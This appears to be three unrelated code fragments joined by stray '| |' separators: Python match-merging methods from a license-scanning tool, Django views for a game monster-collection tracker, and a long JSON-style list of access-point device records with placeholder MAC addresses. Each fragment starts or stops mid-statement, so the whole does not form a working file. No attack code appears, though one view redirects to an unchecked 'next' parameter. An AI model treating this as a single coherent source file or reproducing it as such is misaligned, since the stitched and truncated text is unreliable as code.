return self.qspan.is_after(other.qspan) and self.ispan.is_after(other.ispan)
def combine(self, other):
"""
Return a new match object combining self and an other match.
"""
if self.rule != other.rule:
raise TypeError(
'Cannot combine matches with different rules: '
'from: %(self)r, to: %(other)r' % locals())
if other.matcher not in self.matcher:
newmatcher = ' '.join([self.matcher, other.matcher])
else:
newmatcher = self.matcher
combined = LicenseMatch(
rule=self.rule,
qspan=Span(self.qspan | other.qspan),
ispan=Span(self.ispan | other.ispan),
hispan=Span(self.hispan | other.hispan),
query_run_start=min(self.query_run_start, other.query_run_start),
matcher=newmatcher,
query=self.query)
return combined
def update(self, other):
"""
Update self with other match and return the updated self in place.
"""
combined = self.combine(other)
self.qspan = combined.qspan
self.ispan = combined.ispan
self.hispan = combined.hispan
self.matcher = combined.matcher
self.query_run_start = min(self.query_run_start, other.query_run_start)
return self
def is_small(self):
"""
Return True if this match is "small" based on its rule lengths and
thresholds. Small matches are spurious matches that are discarded.
"""
matched_len = self.len()
min_matched_len = self.rule.min_matched_length
high_matched_len = self.hilen()
min_high_matched_len = self.rule.min_high_matched_length
if TRACE_FILTER_SHORT:
coverage = self.coverage()
logger_debug(
'LicenseMatch.is_small(): %(self)r' % locals(),)
if matched_len < min_matched_len or high_matched_len < min_high_matched_len:
if TRACE_FILTER_SHORT:
logger_debug(' LicenseMatch.is_small(): CASE 1')
return True
if self.rule.is_small and self.coverage() < 80:
if TRACE_FILTER_SHORT:
logger_debug(' LicenseMatch.is_small(): CASE 2')
return True
if TRACE_FILTER_SHORT:
logger_debug(' LicenseMatch.is_small(): not small')
return False
def itokens(self, idx):
"""
Return the sequence of matched itoken ids.
"""
ispan = self.ispan
rid = self.rule.rid
if rid is not None:
for pos, token in enumerate(idx.tids_by_rid[rid]):
if pos in ispan:
yield token
def itokens_hash(self, idx):
"""
Return a hash from the matched itoken ids.
"""
from licensedcode.match_hash import index_hash
itokens = list(self.itokens(idx))
if itokens:
return index_hash(itokens)
# FIXME: this should be done for all the matches found in a given scanned
# location at once to avoid reprocessing many times the original text
def matched_text(
self,
whole_lines=False,
highlight=True,
highlight_matched=u'%s',
highlight_not_matched=u'[%s]',
_usecache=True
):
"""
Return the matched text for this match or an empty string if no query
exists for this match.
`_usecache` can be set to False in testing to avoid any unwanted caching
side effects as the caching depends on which index instance is being
used and this index can change during testing.
"""
query = self.query
if not query:
# TODO: should we raise an exception instead???
# this case should never exist except for tests!
return u''
if whole_lines and query.has_long_lines:
whole_lines = False
return u''.join(get_full_matched_text(
self,
location=query.location,
query_string=query.query_string,
idx=query.idx,
whole_lines=whole_lines,
highlight=highlight,
highlight_matched=highlight_matched,
highlight_not_matched=highlight_not_matched, _usecache=_usecache)
).rstrip()
def set_lines(matches, line_by_pos):
"""
Update a `matches` sequence with start and end line given a `line_by_pos`
{pos: line} mapping.
"""
# if there is no line_by_pos, do not bother: the lines will stay to zero.
if line_by_pos:
for match in matches:
match.start_line = line_by_pos[match.qstart]
match.end_line = line_by_pos[match.qend]
if TRACE_SET_LINES:
logger_debug('set_lines: match.start_line :', match.start_line)
logger_debug('set_lines: match.end_line :', match.end_line)
def merge_matches(matches, max_dist=None):
"""
Merge matches to the same rule in a sequence of LicenseMatch matches. Return
a new list of merged matches if they can be merged. Match sequences that
cannot be merged are returned as-is. For being merged two matches must also
be in increasing query and index positions.
"""
# shortcut for single matches
if len(matches) < 2:
return matches
# only merge matches with the same rule: sort then group by rule for the
# same rule, sort on start, longer high, longer match, matcher type
sorter = lambda m: (m.rule.identifier, m.qspan.start, -m.hilen(), -m.len(), m.matcher)
matches.sort(key=sorter)
matches_by_rule = [(rid, list(rule_matches))
for rid, rule_matches in groupby(matches, key=lambda m: m.rule.identifier)]
if TRACE_MERGE: print('merge_matches: number of matches to process:', len(matches))
if max_dist is None:
max_dist = MAX_DIST
merged = []
for rid, rule_matches in matches_by_rule:
if TRACE_MERGE: logger_debug('merge_matches: processing rule:', rid)
rule_length = rule_matches[0].rule.length
# FIXME this is likely too much as we are getting gaps that are often too big
max_rule_side_dist = min((rule_length // 2) or 1, max_dist)
# compare two matches in the sorted sequence: current and next
i = 0
while i < len(rule_matches) - 1:
j = i + 1
while j < len(rule_matches):
current_match = rule_matches[i]
next_match = rule_matches[j]
if TRACE_MERGE: logger_debug('---> merge_matches: current:', current_match)
if TRACE_MERGE: logger_debug('---> merge_matches: next: ', next_match)
# two exact matches can never be merged as they will not be overlapping
# only sequence matches for the same rule can be merged
# if current_match.matcher != MATCH_SEQ and next_match.matcher != MATCH_SEQ:
# if TRACE_MERGE: logger_debug(' ---> ###merge_matches: both matches are EXACT_MATCHES, skipping')
# break
# FIXME: also considers the match length!
# stop if we exceed max dist
# or distance over 1/2 of rule length
if (current_match.qdistance_to(next_match) > max_rule_side_dist
or current_match.idistance_to(next_match) > max_rule_side_dist):
if TRACE_MERGE: | |
from collections import OrderedDict
import itertools
from operator import getitem
from crispy_forms.bootstrap import FieldWithButtons, StrictButton, Field, Div
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.core.exceptions import PermissionDenied, ObjectDoesNotExist, MultipleObjectsReturned
from django.db.models import Q, Count
from django.forms.models import modelformset_factory
from django.http import HttpResponseForbidden, JsonResponse, HttpResponse, HttpResponseBadRequest
from django.shortcuts import render, redirect, get_object_or_404
from django.template import loader
from django.template.context_processors import csrf
from django.urls import reverse
from bestiary.models import Monster, Building, Fusion, ESSENCE_MAP, GameItem
from herders.decorators import username_case_redirect
from herders.filters import MonsterInstanceFilter
from herders.forms import CompareMonstersForm, FilterMonsterInstanceForm, \
AddMonsterInstanceForm, BulkAddMonsterInstanceForm, \
BulkAddMonsterInstanceFormset, EditMonsterInstanceForm, PowerUpMonsterInstanceForm, AwakenMonsterInstanceForm, \
MonsterPieceForm
from herders.models import Summoner, MonsterInstance, MonsterPiece, MaterialStorage, MonsterShrineStorage, ArtifactInstance
from herders.views.compare import _compare_build_objects, _compare_monster_objects
DEFAULT_VIEW_MODE = 'box'
@username_case_redirect
def monsters(request, profile_name):
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return render(request, 'herders/profile/not_found.html')
# Determine if the person logged in is the one requesting the view
is_owner = (request.user.is_authenticated and summoner.user == request.user)
monster_filter_form = FilterMonsterInstanceForm(auto_id='id_filter_%s')
monster_filter_form.helper.form_action = reverse('herders:monster_inventory', kwargs={'profile_name': profile_name})
context = {
'profile_name': profile_name,
'summoner': summoner,
'is_owner': is_owner,
'monster_filter_form': monster_filter_form,
'view': 'profile',
}
if is_owner or summoner.public:
return render(request, 'herders/profile/monster_inventory/base.html', context)
else:
return render(request, 'herders/profile/not_public.html')
@username_case_redirect
def monster_inventory(request, profile_name, view_mode=None, box_grouping=None):
# If we passed in view mode or sort method, set the session variable and redirect back to ourself without the view mode or box grouping
if view_mode:
request.session['profile_view_mode'] = view_mode.lower()
if box_grouping:
request.session['profile_group_method'] = box_grouping.lower()
if request.session.modified:
return HttpResponse("Profile view mode cookie set")
view_mode = request.session.get('profile_view_mode', DEFAULT_VIEW_MODE).lower()
box_grouping = request.session.get('profile_group_method', 'grade').lower()
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return render(request, 'herders/profile/not_found.html')
monster_queryset = MonsterInstance.objects.filter(owner=summoner).select_related(
'monster',
'monster__awakens_from',
'monster__awakens_to',
)
total_monsters = monster_queryset.count()
is_owner = (request.user.is_authenticated and summoner.user == request.user)
if view_mode == 'list':
monster_queryset = monster_queryset.select_related(
'monster__leader_skill',
'monster__awakens_to',
'default_build',
).prefetch_related(
'monster__skills',
'default_build__runes',
'runes',
'artifacts',
'team_set',
'team_leader',
'tags'
)
elif view_mode == 'collection':
monster_queryset = monster_queryset.prefetch_related(
'monster__skills'
)
form = FilterMonsterInstanceForm(request.GET or None, auto_id='id_filter_%s')
if form.is_valid():
monster_filter = MonsterInstanceFilter(form.cleaned_data, queryset=monster_queryset)
else:
monster_filter = MonsterInstanceFilter(queryset=monster_queryset)
filtered_count = monster_filter.qs.count()
context = {
'monsters': monster_filter.qs,
'total_count': total_monsters,
'filtered_count': filtered_count,
'profile_name': profile_name,
'is_owner': is_owner,
}
if is_owner or summoner.public:
if view_mode == 'pieces':
context['monster_pieces'] = MonsterPiece.objects.filter(owner=summoner).select_related('monster')
template = 'herders/profile/monster_inventory/summoning_pieces.html'
elif view_mode == 'list':
template = 'herders/profile/monster_inventory/list.html'
elif view_mode == 'collection':
monster_stable = {}
# filters
if form.is_valid():
mon_name = form.cleaned_data['monster__name']
filter_monster_name = (Q(name__icontains=mon_name)
| Q(awakens_from__name__icontains=mon_name)
| Q(awakens_from__awakens_from__name__icontains=mon_name)
| Q(awakens_to__name__icontains=mon_name))
if form.cleaned_data['monster__natural_stars'] != "":
mon_stars = form.cleaned_data['monster__natural_stars'].split(',')
filter_nat_stars = (Q(natural_stars__gte=mon_stars[0]) & Q(natural_stars__lte=mon_stars[1]))
else:
filter_nat_stars = None
else:
filter_monster_name = None
filter_nat_stars = None
material = (Q(archetype=Monster.ARCHETYPE_MATERIAL) | Q(archetype=Monster.ARCHETYPE_NONE))
obtainable = Q(obtainable=True)
unawakened = Q(awaken_level=Monster.AWAKEN_LEVEL_UNAWAKENED)
base_material = (Q(monster__archetype=Monster.ARCHETYPE_MATERIAL) | Q(monster__archetype=Monster.ARCHETYPE_NONE))
awakened = Q(monster__awaken_level=Monster.AWAKEN_LEVEL_AWAKENED)
base_unawakened = Q(monster__awaken_level=Monster.AWAKEN_LEVEL_UNAWAKENED)
base_monster_filters = obtainable & unawakened
if filter_monster_name:
base_monster_filters &= filter_monster_name
if filter_nat_stars:
base_monster_filters &= filter_nat_stars
#
base_monsters = Monster.objects.filter(base_monster_filters).exclude(material).order_by('skill_group_id', 'com2us_id').values('name', 'com2us_id', 'element', 'skill_group_id', 'skill_ups_to_max')
skill_groups = itertools.groupby(base_monsters, lambda mon: mon['skill_group_id'])
for skill_group_id, records in skill_groups:
if skill_group_id == -10000:
continue # devilmon, somehow didn't get excluded
records = list(records)
data = {
'name': records[0]['name'],
'elements': {},
'possible_skillups': 0,
'skillups_need': 0,
}
elements = itertools.groupby(records, lambda mon: mon['element'])
for element, records_element in elements:
records_element = list(records_element)
data['elements'][element] = {
'owned': False,
'skilled_up': False,
'skill_ups_to_max': None,
'skillups_max': records_element[0]['skill_ups_to_max'],
}
data['skillups_need'] += records_element[0]['skill_ups_to_max']
monster_stable[skill_group_id] = data
for mon in monster_filter.qs.exclude(base_material):
mon_skill_group = monster_stable.get(mon.monster.skill_group_id)
if not mon_skill_group:
continue # if skill group doesnt exist, don't care
data = monster_stable[mon.monster.skill_group_id]['elements'].get(mon.monster.element)
if not data:
continue # if base monster doesn't exist, continue (i.e. Varis)
if data['skilled_up']:
continue # don't care about other units, if at least one is already fully skilled up
if not data['owned']:
data['owned'] = True
skill_ups_to_max = mon.skill_ups_to_max()
if not skill_ups_to_max:
data['skilled_up'] = True
monster_stable[mon.monster.skill_group_id]['skillups_need'] -= data['skillups_max']
continue
if not data['skill_ups_to_max'] or skill_ups_to_max < data['skill_ups_to_max']:
monster_stable[mon.monster.skill_group_id]['skillups_need'] -= data['skill_ups_to_max'] or data['skillups_max']
monster_stable[mon.monster.skill_group_id]['skillups_need'] += skill_ups_to_max
data['skill_ups_to_max'] = skill_ups_to_max
# some other field than `monster__skill_group_id` is needed, so all records are saved, not only unique ones
skill_up_mons = monster_filter.qs.filter(base_unawakened).exclude(base_material).values('id', 'monster__skill_group_id')
for skill_group_id, records in itertools.groupby(skill_up_mons, lambda x: x['monster__skill_group_id']):
r_c = len(list(records))
monster_stable[skill_group_id]['possible_skillups'] += r_c
monster_stable[skill_group_id]['skillups_need'] -= r_c
for mss_item in MonsterShrineStorage.objects.select_related('item').filter(owner=summoner, item__awaken_level=Monster.AWAKEN_LEVEL_UNAWAKENED):
skill_group_id = mss_item.item.skill_group_id
if skill_group_id in monster_stable:
monster_stable[skill_group_id]['possible_skillups'] += mss_item.quantity
monster_stable[skill_group_id]['skillups_need'] -= mss_item.quantity
monster_stable = sorted(monster_stable.values(), key=lambda x: x['name'])
context['monster_stable'] = monster_stable
template = 'herders/profile/monster_inventory/collection.html'
else:
# Group up the filtered monsters
monster_stable = OrderedDict()
if box_grouping == 'grade' or box_grouping == 'stars':
for x in reversed(range(6)):
monster_stable[f'{x+1}*'] = monster_filter.qs.filter(stars=x+1).order_by('-level', 'monster__element', 'monster__name')
elif box_grouping == 'natural_stars':
for x in reversed(range(5)):
monster_stable[f'Natural {x+1}*'] = monster_filter.qs.filter(monster__natural_stars=x+1).order_by('-stars', '-level', 'monster__name')
elif box_grouping == 'level':
monster_stable['40'] = monster_filter.qs.filter(level=40).order_by('-level', '-stars', 'monster__element', 'monster__name')
monster_stable['39-31'] = monster_filter.qs.filter(level__gt=30).filter(level__lt=40).order_by('-level', '-stars', 'monster__element', 'monster__name')
monster_stable['30-21'] = monster_filter.qs.filter(level__gt=20).filter(level__lte=30).order_by( '-level', '-stars', 'monster__element', 'monster__name')
monster_stable['20-11'] = monster_filter.qs.filter(level__gt=10).filter(level__lte=20).order_by( '-level', '-stars', 'monster__element', 'monster__name')
monster_stable['10-1'] = monster_filter.qs.filter(level__lte=10).order_by('-level', '-stars', 'monster__element', 'monster__name')
elif box_grouping == 'element' or box_grouping == 'attribute':
monster_stable['water'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_WATER).order_by('-stars', '-level', 'monster__name')
monster_stable['fire'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_FIRE).order_by('-stars', '-level', 'monster__name')
monster_stable['wind'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_WIND).order_by('-stars', '-level', 'monster__name')
monster_stable['light'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_LIGHT).order_by('-stars', '-level', 'monster__name')
monster_stable['dark'] = monster_filter.qs.filter(monster__element=Monster.ELEMENT_DARK).order_by('-stars', '-level', 'monster__name')
elif box_grouping == 'archetype':
monster_stable['attack'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_ATTACK).order_by('-stars', '-level', 'monster__name')
monster_stable['hp'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_HP).order_by('-stars', '-level', 'monster__name')
monster_stable['support'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_SUPPORT).order_by('-stars', '-level', 'monster__name')
monster_stable['defense'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_DEFENSE).order_by('-stars', '-level', 'monster__name')
monster_stable['material'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_MATERIAL).order_by('-stars', '-level', 'monster__name')
monster_stable['other'] = monster_filter.qs.filter(monster__archetype=Monster.ARCHETYPE_NONE).order_by('-stars', '-level', 'monster__name')
elif box_grouping == 'priority':
monster_stable['High'] = monster_filter.qs.select_related('monster').filter(owner=summoner, priority=MonsterInstance.PRIORITY_HIGH).order_by('-level', 'monster__element', 'monster__name')
monster_stable['Medium'] = monster_filter.qs.select_related('monster').filter(owner=summoner, priority=MonsterInstance.PRIORITY_MED).order_by('-level', 'monster__element', 'monster__name')
monster_stable['Low'] = monster_filter.qs.select_related('monster').filter(owner=summoner, priority=MonsterInstance.PRIORITY_LOW).order_by('-level', 'monster__element', 'monster__name')
monster_stable['None'] = monster_filter.qs.select_related('monster').filter(owner=summoner).filter(Q(priority=None) | Q(priority=0)).order_by('-level', 'monster__element', 'monster__name')
elif box_grouping == 'family':
for mon in monster_filter.qs:
family_name = mon.monster.base_monster.name
if family_name not in monster_stable:
monster_stable[family_name] = []
monster_stable[family_name].append(mon)
# Sort ordered dict alphabetically by family name
monster_stable = OrderedDict(sorted(monster_stable.items(), key=lambda family:family[0]))
else:
return HttpResponseBadRequest('Invalid sort method')
context['monster_stable'] = monster_stable
context['box_grouping'] = box_grouping.replace('_', ' ')
template = 'herders/profile/monster_inventory/box.html'
return render(request, template, context)
else:
return render(request, 'herders/profile/not_public.html', context)
@username_case_redirect
@login_required
def quick_fodder_menu(request, profile_name):
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return HttpResponseBadRequest()
is_owner = (request.user.is_authenticated and summoner.user == request.user)
if is_owner:
template = loader.get_template('herders/profile/monster_inventory/quick_fodder_menu.html')
response_data = {
'code': 'success',
'html': template.render(),
}
return JsonResponse(response_data)
else:
return HttpResponseForbidden()
@username_case_redirect
@login_required()
def monster_instance_add(request, profile_name):
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return HttpResponseBadRequest()
is_owner = (request.user.is_authenticated and summoner.user == request.user)
if is_owner:
if request.method == 'POST':
form = AddMonsterInstanceForm(request.POST or None)
else:
form = AddMonsterInstanceForm(initial=request.GET.dict())
if request.method == 'POST' and form.is_valid():
# Create the monster instance
new_monster = form.save(commit=False)
new_monster.owner = request.user.summoner
new_monster.save()
messages.success(request, 'Added %s to your collection.' % new_monster)
template = loader.get_template('herders/profile/monster_inventory/monster_list_row_snippet.html')
context = {
'profile_name': profile_name,
'instance': new_monster,
'is_owner': is_owner,
}
response_data = {
'code': 'success',
'instance_id': new_monster.pk.hex,
'html': template.render(context),
}
else:
form.helper.form_action = reverse('herders:monster_instance_add', kwargs={'profile_name': profile_name})
template = loader.get_template('herders/profile/monster_inventory/add_monster_form.html')
# Return form filled in and errors shown
context = {'add_monster_form': form}
context.update(csrf(request))
response_data = {
'code': 'error',
'html': template.render(context),
}
return JsonResponse(response_data)
else:
return HttpResponseForbidden()
@username_case_redirect
@login_required()
def monster_instance_quick_add(request, profile_name, monster_id, stars, level):
return_path = request.GET.get(
'next',
reverse('herders:profile_default', kwargs={'profile_name': profile_name})
)
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return HttpResponseBadRequest()
is_owner = (request.user.is_authenticated and summoner.user == request.user)
monster_to_add = get_object_or_404(Monster, pk=monster_id)
if is_owner:
new_monster = MonsterInstance.objects.create(owner=summoner, monster=monster_to_add, stars=int(stars), level=int(level), fodder=True, notes='', priority=MonsterInstance.PRIORITY_DONE)
messages.success(request, 'Added %s to your collection.' % new_monster)
return redirect(return_path)
else:
return HttpResponseForbidden()
@username_case_redirect
@login_required()
def monster_instance_bulk_add(request, profile_name):
return_path = reverse('herders:profile_default', kwargs={'profile_name': profile_name})
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return HttpResponseBadRequest()
is_owner = (request.user.is_authenticated and summoner.user == request.user)
BulkAddFormset = modelformset_factory(MonsterInstance, form=BulkAddMonsterInstanceForm, formset=BulkAddMonsterInstanceFormset, extra=5, max_num=50)
if request.method == 'POST':
formset = BulkAddFormset(request.POST)
else:
formset = BulkAddFormset()
context = {
'profile_name': request.user.username,
'return_path': return_path,
'is_owner': is_owner,
'bulk_add_formset_action': request.path + '?next=' + return_path,
'view': 'profile',
}
if is_owner:
if request.method == 'POST':
if formset.is_valid():
new_instances = formset.save(commit=False)
for new_instance in new_instances:
try:
if new_instance.monster:
new_instance.owner = summoner
if new_instance.monster.archetype == Monster.ARCHETYPE_MATERIAL:
new_instance.priority = MonsterInstance.PRIORITY_DONE
new_instance.save()
messages.success(request, 'Added %s to your collection.' % new_instance)
except ObjectDoesNotExist:
# Blank form, don't care
pass
return redirect(return_path)
else:
raise PermissionDenied("Trying to bulk add to profile you don't own")
context['bulk_add_formset'] = formset
return render(request, 'herders/profile/monster_inventory/bulk_add_form.html', context)
@username_case_redirect
def monster_instance_view(request, profile_name, instance_id):
return_path = request.GET.get(
'next',
request.path
)
try:
summoner = Summoner.objects.select_related('user').get(user__username=profile_name)
except Summoner.DoesNotExist:
return render(request, 'herders/profile/not_found.html')
is_owner = (request.user.is_authenticated and summoner.user == request.user)
context = {
'profile_name': profile_name,
'summoner': summoner,
'return_path': return_path,
'is_owner': is_owner,
'view': 'profile',
}
try:
context['instance'] = MonsterInstance.objects.select_related('monster', 'monster__leader_skill').prefetch_related('monster__skills').get(pk=instance_id)
if context['instance'].owner != summoner:
rev = reverse('herders:monster_instance_view',
kwargs={
"profile_name": context['instance'].owner.user.username,
"instance_id": instance_id,
},
)
return redirect(rev, permanent=True)
except ObjectDoesNotExist:
return render(request, 'herders/profile/monster_view/not_found.html', context)
if is_owner or summoner.public:
| |
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23120
],
"topId":22953,
"mac":"A1:A1:A5:A1:B1:86"
},
{
"deviceId":13348,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23122
],
"topId":22956,
"mac":"A1:A1:A5:A1:B1:87"
},
{
"deviceId":13349,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23124
],
"topId":22959,
"mac":"A1:A1:A5:A1:B1:88"
},
{
"deviceId":13350,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:09",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23126
],
"topId":22962,
"mac":"A1:A1:A5:A1:B1:89"
},
{
"deviceId":13351,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23128
],
"topId":22965,
"mac":"A1:A1:A5:A1:B1:90"
},
{
"deviceId":13352,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23130
],
"topId":22968,
"mac":"A1:A1:A5:A1:B1:91"
},
{
"deviceId":13354,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23134
],
"topId":22944,
"mac":"A1:A1:A5:A1:B1:93"
},
{
"deviceId":13355,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23136
],
"topId":22947,
"mac":"A1:A1:A5:A1:B1:94"
},
{
"deviceId":13356,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23138
],
"topId":22950,
"mac":"A1:A1:A5:A1:B1:95"
},
{
"deviceId":13357,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23140
],
"topId":22953,
"mac":"A1:A1:A5:A1:B1:96"
},
{
"deviceId":13358,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23142
],
"topId":22956,
"mac":"A1:A1:A5:A1:B1:97"
},
{
"deviceId":13359,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23144
],
"topId":22959,
"mac":"A1:A1:A5:A1:B1:98"
},
{
"deviceId":13360,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23146
],
"topId":22962,
"mac":"A1:A1:A5:A1:B1:99"
},
{
"deviceId":13361,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23148
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:01"
},
{
"deviceId":13362,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
23150
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:02"
},
{
"deviceId":13364,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:10",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22946
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:04"
},
{
"deviceId":13365,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22949
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:05"
},
{
"deviceId":13366,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22952
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:06"
},
{
"deviceId":13367,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22955
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:07"
},
{
"deviceId":13368,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22958
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:08"
},
{
"deviceId":13369,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22961
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:09"
},
{
"deviceId":13370,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22964
],
"topId":22962,
"mac":"A1:A1:A5:A1:C1:10"
},
{
"deviceId":13371,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22967
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:11"
},
{
"deviceId":13372,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22970
],
"topId":22968,
"mac":"A1:A1:A5:A1:C1:12"
},
{
"deviceId":13374,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22974
],
"topId":22944,
"mac":"A1:A1:A5:A1:C1:14"
},
{
"deviceId":13375,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22976
],
"topId":22947,
"mac":"A1:A1:A5:A1:C1:15"
},
{
"deviceId":13376,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22978
],
"topId":22950,
"mac":"A1:A1:A5:A1:C1:16"
},
{
"deviceId":13377,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22980
],
"topId":22953,
"mac":"A1:A1:A5:A1:C1:17"
},
{
"deviceId":13378,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:11",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22982
],
"topId":22956,
"mac":"A1:A1:A5:A1:C1:18"
},
{
"deviceId":13379,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22984
],
"topId":22959,
"mac":"A1:A1:A5:A1:C1:19"
},
{
"deviceId":13380,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22986
],
"topId":22962,
"mac":"A1:A1:A5:A1:C1:20"
},
{
"deviceId":13381,
"sn":None,
"deviceName":"AP设备",
"softwareVersion":None,
"deviceModel":None,
"createDate":"2019-04-08 15:30:12",
"remark":"",
"isOnline":False,
"deviceType":1,
"bindAreaIds":[
22988
],
"topId":22965,
"mac":"A1:A1:A5:A1:C1:21"
},
{
"deviceId":13382,
"sn":None,
